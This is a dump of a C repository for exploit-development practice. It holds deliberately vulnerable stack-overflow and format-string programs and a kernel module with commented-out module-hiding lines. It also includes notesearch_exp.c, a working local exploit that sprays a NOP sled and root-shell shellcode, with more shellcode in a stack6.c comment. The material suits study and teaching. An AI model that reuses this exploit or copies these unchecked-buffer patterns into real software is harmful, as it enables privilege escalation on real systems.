├── .gitignore ├── InsecureProgramming ├── Makefile ├── stack1.c ├── stack2.c ├── stack3.c ├── stack4.c ├── stack5.c └── stack6.c ├── Kernel ├── .gitignore ├── Makefile └── helloWorld.c ├── Makefile ├── README.md ├── SystemsProgramming ├── Wk1 │ ├── hw_bytes.c │ └── hw_write.c ├── Wk2 │ └── wk2.c ├── const_pointer.c └── q1_1.c ├── auth_ovflw.c ├── enc ├── enc.c ├── fmt_strings.c ├── fmt_vln.c ├── getenv.c └── notesearch_exp.c /.gitignore: -------------------------------------------------------------------------------- 1 | #Kernel 2 | *.out 3 | 4 | #Text 5 | *.txt 6 | 7 | # Object files 8 | *.o 9 | *.ko 10 | *.obj 11 | *.elf 12 | 13 | # Precompiled Headers 14 | *.gch 15 | *.pch 16 | 17 | # Libraries 18 | *.lib 19 | *.a 20 | *.la 21 | *.lo 22 | 23 | # Shared objects (inc. Windows DLLs) 24 | *.dll 25 | *.so 26 | *.so.* 27 | *.dylib 28 | 29 | # Executables 30 | *.exe 31 | *.out 32 | *.app 33 | *.i*86 34 | *.x86_64 35 | *.hex 36 | 37 | # Debug files 38 | *.dSYM/ 39 | -------------------------------------------------------------------------------- /InsecureProgramming/Makefile: -------------------------------------------------------------------------------- 1 | # Outputs are named *.out so that .gitignore excludes them. NOTE(review): -fno-stack-protector turns off the GCC stack canary for these overflow exercises; keep the flag out of other builds. The stack2 rule has a stray l after $(CFLAGS), which turns the flag into -fno-stack-protectorl, an option GCC does not accept. 2 | CC = gcc 3 | CFLAGS = -fno-stack-protector 4 | DEBUG = -ggdb 5 | stack1: stack1.c 6 | $(CC) $(DEBUG) $(CFLAGS) -Wmultichar -o stack1.out stack1.c 7 | 8 | stack2: stack2.c 9 | $(CC) -ggdb $(CFLAGS)l -o stack2.out stack2.c 10 | 11 | stack3: stack3.c 12 | $(CC) -ggdb -fno-stack-protector -o stack3.out stack3.c 13 | 14 | stack4: stack4.c 15 | $(CC) -ggdb -fno-stack-protector -o stack4.out stack4.c 16 | 17 | stack5: stack5.c 18 | $(CC) -ggdb -fno-stack-protector -o stack5.out stack5.c 19 | 20 | stack6: stack6.c 21 | $(CC) $(DEBUG) $(CFLAGS) -o stack6.out stack6.c 22 | 23 | clean: 24 | rm *.out 25 | -------------------------------------------------------------------------------- /InsecureProgramming/stack1.c: 
-------------------------------------------------------------------------------- 1 | /* stack1-stdin.c * 2 | * specially crafted to feed your brain by gera */ 3 | 4 | #include 5 | 6 | int main() { 7 | int cookie; /* never assigned anywhere in this file */ 8 | char buf[10]; 9 | 10 | printf("buf: %08x cookie: %08x\n", &buf, &cookie); /* NOTE(review): %08x is passed pointer values; %p with a (void *) cast is the matching conversion */ 11 | gets(buf); /* NOTE(review): gets() has no length argument, so any line longer than 9 characters writes past buf[10] into neighbouring stack data; this unbounded read appears to be the point of the exercise. gets() was removed in C11; the bounded form is fgets(buf, sizeof buf, stdin). */ 12 | 13 | printf("cookie: %x\n", *(&cookie)); 14 | 15 | if (cookie == 0x41424344) 16 | printf("you win!\n"); 17 | } 18 | -------------------------------------------------------------------------------- /InsecureProgramming/stack2.c: -------------------------------------------------------------------------------- 1 | /* stack2-stdin.c * 2 | * specially crafted to feed your brain by gera */ 3 | 4 | #include 5 | 6 | int main() { 7 | int cookie; 8 | char buf[12]; 9 | 10 | printf("buf: %08x cookie: %08x\n", &buf, &cookie); 11 | gets(buf); /* NOTE(review): unbounded gets() into buf[12]; the bounded form is fgets(buf, sizeof buf, stdin) */ 12 | // DCBA == 0x41424344 13 | if (cookie == 0x41424344) 14 | printf("you win!\n"); 15 | } 16 | -------------------------------------------------------------------------------- /InsecureProgramming/stack3.c: -------------------------------------------------------------------------------- 1 | /* stack3-stdin.c * 2 | * specially crafted to feed your brain by gera */ 3 | 4 | #include 5 | void canNeverExecute(){ /* no call to this function appears in this file */ 6 | puts("Your LEET!!"); 7 | exit(0); 8 | } 9 | 10 | void print(char buf[], int cookie){ 11 | printf("buf: %08x cookie: %08x\n", &buf, &cookie); /* NOTE(review): buf and cookie here are the parameters, so this prints the addresses of the copies, not of the locals in main */ 12 | } 13 | 14 | int main(void) { 15 | int cookie; 16 | char buf[8]; 17 | print(buf[], &cookie); /* NOTE(review): does not compile as written: buf[] is not an expression, and print() declares an int second parameter while &cookie is an int * */ 18 | 19 | gets(buf); /* NOTE(review): unbounded gets() into buf[8]; the bounded form is fgets(buf, sizeof buf, stdin) */ 20 | 21 | if (cookie == 0x01020005) 22 | printf("you win!\n"); 23 | } 24 | -------------------------------------------------------------------------------- /InsecureProgramming/stack4.c: -------------------------------------------------------------------------------- 1 | /* stack4-stdin.c * 2 | * specially crafted to feed your brain by gera */ 3 | 4 | #include 5 | 6 | int main() { 7 | int cookie; 8 | char buf[80]; 9 | 10 | printf("buf: %08x cookie: %08x\n", &buf, 
&cookie); 11 | gets(buf); /* NOTE(review): unbounded gets() into the 80-byte buf declared above; the bounded form is fgets(buf, sizeof buf, stdin) */ 12 | 13 | if (cookie == 0x000d0a00) 14 | printf("you win!\n"); 15 | } 16 | -------------------------------------------------------------------------------- /InsecureProgramming/stack5.c: -------------------------------------------------------------------------------- 1 | /* stack5-stdin.c * 2 | * specially crafted to feed your brain by gera 3 | * python -c "print 'a'*1000 | ./stack6.out" 4 | */ 5 | 6 | #include 7 | void LEET(){ /* no call to this function appears in this file */ 8 | printf("YOu are now a leet program cracker\n"); 9 | } 10 | int main(int argc, char **argv) { 11 | 12 | char buf[64]; 13 | gets(buf); /* NOTE(review): unbounded gets() into buf[64]; nothing else in main limits the input length. The bounded form is fgets(buf, sizeof buf, stdin). */ 14 | } 15 | -------------------------------------------------------------------------------- /InsecureProgramming/stack6.c: -------------------------------------------------------------------------------- 1 | #include 2 | /* (gdb) run perl -e 'print "A" x 268 . "\x90\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"' 3 | ./stack6.out ‘python -c "print 'a'*1000"’ 4 | 5 | */ 6 | 7 | int main(int argc, char * argv[]) { 8 | 9 | char buf[256]; 10 | puts("cli input"); 11 | puts("./stack6.out `python -c ""print 'a'*10""`"); 12 | 13 | if(argc == 1) { 14 | 15 | printf("Usage: %s \n", argv[0]); 16 | exit(0); 17 | 18 | } 19 | 20 | strcpy(buf,argv[1]); /* NOTE(review): argv[1] is copied with no length check into buf[256]; an argument of 256 bytes or more overruns the buffer. Check strlen(argv[1]) < sizeof buf before copying, or use snprintf with sizeof buf and a fixed %s format. */ 21 | printf("%s\n", buf); 22 | 23 | } -------------------------------------------------------------------------------- /Kernel/.gitignore: -------------------------------------------------------------------------------- 1 | # Object files 2 | *.o* 3 | *.ko* 4 | *.obj 5 | *.elf 6 | 7 | # Kernel 8 | *.tmp_versions/ 9 | *.mod* 10 | *.symvers 11 | 12 | # Precompiled Headers 13 | *.gch 14 | *.pch 15 | 16 | # Libraries 17 | *.lib 18 | *.a 19 | *.la 20 | *.lo 21 | 22 | # Shared objects (inc. 
Windows DLLs) 23 | *.dll 24 | *.so 25 | *.so.* 26 | *.dylib 27 | 28 | # Executables 29 | *.exe 30 | *.out 31 | *.app 32 | *.i*86 33 | *.x86_64 34 | *.hex 35 | 36 | # Debug files 37 | *.dSYM/ 38 | -------------------------------------------------------------------------------- /Kernel/Makefile: -------------------------------------------------------------------------------- 1 | obj-m := helloWorld.o 2 | KERNEL_DIR = /lib/modules/$(shell uname -r)/build 3 | PWD = $(shell pwd) 4 | all: 5 | $(MAKE) -C $(KERNEL_DIR) SUBDIRS=$(PWD) 6 | clean: 7 | rm -rf *.o *.symvers *.mod.* *.order 8 | -------------------------------------------------------------------------------- /Kernel/helloWorld.c: -------------------------------------------------------------------------------- 1 | /* 2 | /usr/src/linux-headers-2.6.32-21-generic/include/linux 3 | */ 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | MODULE_LICENSE("GPL"); 10 | 11 | #define START_CHECK 0XC0000000 12 | #define END_CHECK 0xD0000000 13 | 14 | 15 | typedef unsigned int psize; 16 | 17 | static int in_module(void){ 18 | /* Kernel Module hiding*/ 19 | // list_del_init(&__this_module.list); // hide from lsmod:/proc/modules 20 | // kobject_del(&THIS_MODULE->mkobj.kobj); //hide from /sys/module 21 | 22 | printk("Hacking: module loaded\n"); 23 | return 0; 24 | } 25 | 26 | static void out_module(void){ 27 | printk("Hacking: module removed\n"); 28 | } 29 | 30 | module_init(in_module); 31 | module_exit(out_module); -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | 3 | format: fmt_strings.c 4 | gcc -Wall -ggdb -o fmt_strings.out fmt_strings.c 5 | fmt: fmt_vln.c 6 | gcc -Wall -ggdb -o fmt_vln.out fmt_vln.c 7 | getenv: getenv.c 8 | gcc -Wall -o getenv.out getenv.c 9 | clean: 10 | rm *.out -------------------------------------------------------------------------------- /README.md: 
-------------------------------------------------------------------------------- 1 | # C-Hacking 2 | Practice and learning in C reverse engineering (RE) and exploit analysis. The InsecureProgramming/ programs, auth_ovflw.c and fmt_vln.c are deliberately vulnerable study targets (unchecked copies into fixed-size stack buffers, user input used as a printf format string). 3 | -------------------------------------------------------------------------------- /SystemsProgramming/Wk1/hw_bytes.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main(){ 5 | printf("Hello C data types. int min & max \n %d %d\n\n", INT_MIN, INT_MAX); 6 | printf("Char is a least 8bits\n"); 7 | printf("char is %d bITS\n", CHAR_BIT ); 8 | printf("sizeof(short) is %lu bytes\n", sizeof(short) ); 9 | printf("sizeof(long) is %lu bytes\n", sizeof(long) ); 10 | 11 | 12 | return 0; 13 | } -------------------------------------------------------------------------------- /SystemsProgramming/Wk1/hw_write.c: -------------------------------------------------------------------------------- 1 | /* Using the write() system call to produce output. 2 | See man write for usage: 3 | ssize_t write(int fd, const void *buf, size_t count); 4 | write() writes up to count bytes to the file descriptor fd, e.g. stdout or stderr. 5 | 6 | */ 7 | 8 | #include 9 | #include 10 | #include 11 | #include 12 | 13 | // These are already defined in unistd.h 14 | #define STDOUT_FILENO 1 15 | #define STDERR_FILENO 2 16 | 17 | int main(){ 18 | mode_t mode = S_IRUSR | S_IWUSR; 19 | //open is different then fopen 20 | int fd = open(".", O_CREAT | O_TRUNC | O_RDWR, mode); 21 | if (fd == -1) 22 | { 23 | perror("open failed"); 24 | exit(1); 25 | } 26 | 27 | printf("My fd is %d", fd ); //printf has a buffer. thats why it prints after unless \n 28 | write(STDOUT_FILENO, "this is an erorroror\n", 21); //without error checking 29 | if ( -1 == write(STDERR_FILENO, "t\n", 2 ) ) //with error checking 30 | puts("error with error"); 31 | write(fd, "great!\n", 7); 32 | close(fd); 33 | 34 | 35 | return 0; //in bash use 'echo $?' 
to print last programs exit code 36 | 37 | } -------------------------------------------------------------------------------- /SystemsProgramming/Wk2/wk2.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | extern char ** environ; 5 | 6 | int main(){ 7 | char* s = getenv("USER"); 8 | printf("user is: %d\n", s ); /* NOTE(review): s is a char *, so %d does not match it; %s is the string conversion, and getenv() returns NULL when USER is unset, so s needs a NULL check before it is printed */ 9 | const int consint; /* NOTE(review): const object left uninitialised; nothing below reads it */ 10 | 11 | // consint = 32432; 12 | 13 | int data[5] = {10, 30, 60, 50, 40}; 14 | char string[] = "A B C 0123"; 15 | unsigned int temp; 16 | printf("data: %d\n", *(data + 1)); 17 | 18 | printf("Swapping\n"); 19 | 20 | temp = data[0]; 21 | data[0] = data[4]; 22 | data[4] = temp; 23 | for(size_t idx = 0; idx < 5; idx++){ 24 | printf("data[%zu] = %d\n", idx, *(data + idx) ); 25 | } 26 | 27 | 28 | return 0; 29 | } -------------------------------------------------------------------------------- /SystemsProgramming/const_pointer.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | /* 6 | * Working with const, const *, * const, const * const 7 | */ 8 | 9 | int main(){ 10 | 11 | const int const1 = 96; // const1 cannot be changed and is a constant integer value stored in.... 12 | unsigned int var, retValue; 13 | retValue = scanf("%d", &var); /* NOTE(review): var is unsigned int, so %u is the matching conversion */ 14 | errno = 0; /* NOTE(review): clearing errno after the call erases anything scanf() set, so the perror() below has nothing to report */ 15 | if (retValue == 0){ /* NOTE(review): scanf() returns the number of items converted, so 0 means the input did not parse; a successful read returns 1 here, which this code sends to the perror() branch */ 16 | printf("No error\n"); 17 | } 18 | else 19 | perror("scanf"); 20 | 21 | printf("addr of const1 is:\t%p\n", &const1); 22 | printf("addr of var is: \t%p\n", &var); 23 | return 0; 24 | } -------------------------------------------------------------------------------- /SystemsProgramming/q1_1.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | int a; // in BSS 4 | static int b; // in BSS, BSS is usually zeroed out 5 | 6 | int main(){ 7 | static int c; // are static variables zeroed? 
____ 8 | char * ptrr = "Hello"; 9 | ptrr += 2; 10 | int *ptr; // holds a memory address ptr |____| 11 | *ptr = 0xAA; /* NOTE(review): ptr is never given an address, so this store goes through an indeterminate pointer (undefined behaviour); point it at an int first */ 12 | printf("addr of ptr is: %#x\n", &ptr ); /* NOTE(review): %#x is given a pointer here and two lines below; %p with a (void *) cast is the matching conversion */ 13 | printf("contents of ptr is: %#x\n", *ptr ); 14 | printf("ptr is: %#x\n", ptr ); 15 | // printf("%d %d %d %d\n",a,b,c,d ); 16 | return 0; 17 | } -------------------------------------------------------------------------------- /auth_ovflw.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int check_auth(char * password){ 6 | int auth_flag = 0; 7 | char password_buffer[16]; 8 | strcpy(password_buffer, password); /* NOTE(review): main passes argv[1] here and it is copied with no length check into a 16-byte buffer; an argument of 16 or more characters writes past the buffer. password_buffer and auth_flag are both locals of this function, so an overrun can alter auth_flag or other stack data and the return value can no longer be trusted. Reject strlen(password) >= sizeof password_buffer before copying, or compare the argument directly without a copy. */ 9 | 10 | if( 0 == strcmp(password_buffer, "brillig") ) /* NOTE(review): the accepted passwords are string literals compiled into the binary */ 11 | auth_flag = 1; 12 | if( 0 == strcmp(password_buffer, "outgrabe") ) 13 | auth_flag = 1; 14 | 15 | return auth_flag; 16 | } 17 | 18 | int main(int argc, char* argv[]){ 19 | if(argc < 2){ 20 | printf("Usage: %s \n", argv[0]); 21 | exit(0); 22 | } 23 | if( check_auth(argv[1]) ){ 24 | printf("\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n"); 25 | printf(" Access Granted.\n"); 26 | printf("\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n"); 27 | } else{ 28 | printf("\nAccess Denied\n"); 29 | } 30 | } -------------------------------------------------------------------------------- /enc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/211217613/C-Hacking/8eea8ca615a623ec5d148575103f5cc0ece17309/enc -------------------------------------------------------------------------------- /enc.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | typedef uint8_t byte; 7 | 8 | void enc(char* plaintxt, byte key){ /* NOTE(review): the key is 8 bits, so there are at most 256 keystreams; this transform offers no real confidentiality */ 9 | printf("key: %x\n", key); 10 | printf("plaintext is: %C\n", *plaintxt); /* NOTE(review): %C is the wide-character conversion; %c matches a char */ 11 | while( *plaintxt ){ 12 | puts("Inside while"); 13 | printf("key: %x\n", key ); 14 | key = ( key * 5) + 7; /* key is a uint8_t, so the result is reduced modulo 256 on assignment */ 15 | *plaintxt = *plaintxt ^ key; /* writes through plaintxt, so the buffer passed by the caller must be writable storage */ 16 | printf("pt 
^= key: %x\n", *plaintxt ); 17 | 18 | *(plaintxt++) += 9; 19 | printf("plaintxt++: %x\n", *plaintxt); 20 | } 21 | } 22 | 23 | int main (int argc, char * argv[]){ 24 | // char * message = {0x9b, 0x2a, 0x2b, 0xfc, 0x61, 0x2f, 0x0c, 0x66, 0x6b, 0x70, 0x20, 0x47, 0xd9, 0xcb, 0xc7, 0x65, 0x66}; 25 | char *plaintxt = "hhhheeeeelllllllllooooooooooo"; 26 | byte key = 0xAA; 27 | enc(plaintxt, key); 28 | return 0; 29 | } 30 | 31 | // Message: 9b 2a 2b fc 61 2f 0c 66 6b 70 20 47 d9 cb c7 65 66 32 | 33 | 34 | -------------------------------------------------------------------------------- /fmt_strings.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main(){ 5 | char string[10]; 6 | int A = -73; 7 | int count_one, count_two; 8 | unsigned int B = 31337; 9 | 10 | strcpy(string, "sample"); 11 | 12 | printf("[A] Dec: %d, Hex: %x, unsigned: %u\n",A, A,A); 13 | printf("[B] Dec: %d, Hex: %x, unsigned: %u\n",B, B, B); 14 | printf("The number of bytes written up to this point X%n \ 15 | is being stored in count_one, and the number of bytes \ 16 | up to here X%n is being stored in count_two.\n", &count_one, &count_two); 17 | printf("count_one: %d\n", count_one ); 18 | printf("count_two: %d\n", count_two ); 19 | printf("A is %d and is at %#08x. B is %#08x. 
\n", A, &A ); 20 | return 0; 21 | } -------------------------------------------------------------------------------- /fmt_vln.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main(int argc, char *argv[]){ 5 | char text[1024] = {}; 6 | static int test_val = -72; 7 | 8 | if( 2 > argc ){ 9 | printf("Usage: %s \n", argv[0]); 10 | exit(0); 11 | } 12 | 13 | strcpy(text, argv[1]); 14 | 15 | printf("The right way to print user-controlled input:\n"); 16 | printf("%s\n", text ); 17 | 18 | printf("\nThe wrong way to print user-controlled input:\n"); 19 | printf(text); 20 | 21 | puts(""); 22 | printf("%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s"); 23 | 24 | //DEBUG 25 | printf("[*] test_val @ %#x = %d %#x\n", &test_val, test_val, test_val ); 26 | } -------------------------------------------------------------------------------- /getenv.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main(int argc, char **argv, char **env){ 4 | int index; 5 | for(index = 0; index < 100; index++){ 6 | printf("env[%d]: %s :: %#x\n",index, env[index], &env[index]); 7 | } 8 | return 0; 9 | } 10 | -------------------------------------------------------------------------------- /notesearch_exp.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | char shellcode[] = 6 | "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68" 7 | "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89" 8 | "\xe1\xcd\x80"; 9 | 10 | int main(int argc, char *argv[]){ 11 | unsigned int i, *ptr, ret, offset = 270; 12 | char *command, *buffer; 13 | 14 | command = (char*) malloc(200); 15 | bzero(command, 200); 16 | // memset(command, NULL, 200); 17 | strcpy(command, "./notesearch \' "); 18 | buffer = command + strlen(command); 19 | 20 | if (argc > 1 ) 21 | offset = atoi(argv[1]); 22 | 23 | ret = (unsigned int ) 
&i - offset; 24 | 25 | for(i = 0; i < 160; i+=4){ 26 | *((unsigned int*) (buffer + i)) = ret; 27 | } 28 | memset(buffer, 0x90, 60); //NOP slide 29 | memcpy(buffer + 60, shellcode, sizeof(shellcode) - 1); 30 | strcat(command, "\'"); 31 | system(command); // run exploit 32 | 33 | free(command); 34 | return 0; 35 | } --------------------------------------------------------------------------------